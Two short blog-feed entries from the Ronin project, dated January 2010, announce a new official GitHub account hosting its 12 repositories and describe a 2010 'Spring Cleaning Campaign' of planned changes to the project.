Official GitHub Account2010-01-29 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/01/29/official-github-account.html<p>While working on the <a href="/blog/2010/01/12/spring-cleaning.html">Spring Cleaning Campaign (2010)</a>, I noticed that
Ronin had grown to 12 repositories. Being such a large and established project,
I realized it was high time to create an official GitHub account to host the
Ronin repositories.</p>
<p>From now on, the source for all Ronin repositories is <a href="https://github.com/ronin-rb/">github.com/ronin-rb</a>.</p>
Spring Cleaning2010-01-12 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2010/01/12/spring-cleaning.html<p>During the end of 2009 I ended up taking a break from working on Ronin, and
shifted my efforts to other projects. Once 2009 came to a slow grinding
halt and made way for 2010, I decided to come back to Ronin and not let it
fall into disrepair. I and other Ronin developers compiled a list of the
radical changes we felt were necessary, in order to keep Ronin relevant.
Thus the <a href="http://groups.google.com/group/ronin-rb/browse_thread/thread/d01f1fb4460d4b22#">Spring Cleaning Campaign</a>
of 2010 was started.</p>